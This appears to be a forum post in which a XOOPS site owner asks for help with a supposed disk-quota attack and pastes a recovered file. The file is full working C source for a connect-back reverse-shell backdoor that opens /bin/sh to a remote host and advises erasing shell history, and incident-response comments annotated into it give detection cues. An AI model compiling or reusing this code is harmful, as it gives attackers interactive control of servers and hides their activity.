    My XOOPS web site is down because of a classic DoS (space quota) attack.
The web site runs on Apache, on a Linux server...
I found this temp file on the server, left by the attacker; maybe it could give you more info:
" #include 
#include 
#include 
#include 
#include 
/*
 * Analyst summary of the recovered file (incident-response notes).
 *
 * This program is not a denial-of-service tool. Its own banner calls it a
 * "Connect Back Backdoor", and the code matches that: it opens an OUTBOUND
 * TCP connection to a host and port given on the command line (port 80 if
 * none is given), then replaces a forked child with /bin/sh whose stdin,
 * stdout and stderr are all that socket. Whoever is listening on the remote
 * end gets an interactive shell running as the account that started it.
 *
 * What this means for triage:
 *  - Finding it in a temp directory shows the attacker could write files
 *    there; whether it was compiled and run cannot be told from the source
 *    alone -- check for a matching binary, process list and outbound flows.
 *  - Treat the host as compromised at the privilege level of the web
 *    server account, not merely as "disk quota exhausted".
 *  - The literal strings below (banner, status lines, welcome text) are
 *    usable as file and network detection signatures.
 *
 * Usage printed by the program: argv[1] = remote host, optional
 * argv[2] = remote port. Returns 1 on any setup failure, 0 otherwise.
 */
int main(int argc, char **argv) {
 char *host;
 /* Default destination port is 80, so the outbound session uses the same
    port number as ordinary HTTP; egress rules keyed only on port would
    not distinguish it. */
 int port = 80;
 int f;
 int l;
 int sock;
 struct in_addr ia;
 struct sockaddr_in sin, from;
 struct hostent *he;
 /* Text sent to the remote operator once connected. It tells them to run
    "unset HISTFILE; unset SAVEHIST" -- so an empty or missing shell
    history on the server is NOT evidence that no commands were run. */
 char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n"
 "Issue \"export TERM=xterm; exec bash -i\"\n"
 "For More Reliable Shell.\n"
 "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
 "For Not Getting Logged.\n(;\n\n";
 /* Self-identifying banner written to local stdout. */
 printf("Ir4dex Connect Back Backdoor\n\n");
 /* Requires one or two arguments: host, and optionally port. */
 if (argc < 2 || argc > 3) {
 printf("Usage: %s [Host] \n", argv[0]);
 return 1;
 }
 printf("[*] Dumping Arguments\n");
 l = strlen(argv[1]);
 if (l <= 0) {
 printf("[-] Invalid Host Name\n");
 return 1;
 }
 if (!(host = (char *) malloc(l))) {
 printf("[-] Unable to Allocate Memory\n");
 return 1;
 }
 strncpy(host, argv[1], l);
 /* Optional second argument overrides the default port; accepted range
    is 1..65535. */
 if (argc == 3) {
 port = atoi(argv[2]);
 if (port <= 0 || port > 65535) {
 printf("[-] Invalid Port Number\n");
 return 1;
 }
 }
 printf("[*] Resolvendo Nome Do Host\n");
 /* Destination may be a DNS name or a dotted address: a name lookup is
    tried first, so resolver/DNS logs from the incident window may show
    the attacker's host name. */
 he = gethostbyname(host);
 if (he) {
 memcpy(&ia.s_addr, he->h_addr, 4);
 } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
 printf("[-] Unable to Resolve: %s\n", host);
 return 1;
 }
 sin.sin_family = PF_INET;
 sin.sin_addr.s_addr = ia.s_addr;
 sin.sin_port = htons(port);
 printf("[*] Conectando...\n");
 /* Plain IPv4 TCP client socket; the server initiates the connection,
    which is why inbound-only firewalling does not stop this pattern.
    Restricting outbound connections from the web server account does. */
 if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
 printf("[-] Socket Error\n");
 return 1;
 }
 if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
 printf("[-] Unable to Connect\n");
 return 1;
 }
 printf("[*] Spawning Shell\n");
 /* The parent returns right after the fork (see the end of main); the
    child carries on by itself as the shell process. */
 f = fork( );
 if (f < 0) {
 printf("[-] Unable to Fork\n");
 return 1;
 } else if (!f) {
 /* Child: send the welcome text over the socket. It travels in clear
    text, so it can be matched by network monitoring. */
 write(sock, msg, sizeof(msg));
 /* Point stdin (0), stdout (1) and stderr (2) at the socket. */
 dup2(sock, 0);
 dup2(sock, 1);
 dup2(sock, 2);
 /* Runs /bin/sh with argv[0] set to "shell": in a process listing look
    for a process named "shell" whose executable is /bin/sh and whose
    standard descriptors are a TCP socket. */
 execl("/bin/sh", "shell", NULL);
 /* Reached only if execl() fails. */
 close(sock);
 return 0;
 }
 /* Parent: report success locally and exit. */
 printf("[*] Conectado\n\n");
 return 0;
} "
Does anybody know a quick fix for this? Please!